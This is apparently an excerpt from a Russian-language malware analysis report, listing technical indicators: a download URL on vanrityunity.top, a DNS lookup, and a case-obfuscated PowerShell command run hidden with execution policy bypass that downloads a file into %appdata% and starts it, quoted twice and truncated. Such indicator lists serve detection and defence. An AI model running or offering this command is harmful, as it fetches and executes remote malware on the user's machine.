Техническая информация
- http://vanrityunity.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWerSHELl.Exe -eXecUtionPoLIcY bypass -NoProFILE -WiNdOwstYLe HIdDEn (NEw-ObJECt sYSTem.NEt.weBcLIeNT).DOwNLOadFIle('http://vanrityunity.top/search.php','%aPpdata%.EXe');sTaRT-...
- DNS ASK va####yunity.top
- '<SYSTEM32>\cmd.exe' /C "POWerSHELl.Exe -eXecUtionPoLIcY bypass -NoProFILE -WiNdOwstYLe HIdDEn (NEw-ObJECt sYSTem.NEt.weBcLIeNT).DOwNLOadFIle('http://vanrityunity.top/search.php','%aPpdata%.EXe');sTaRT-...' (со скрытым окном)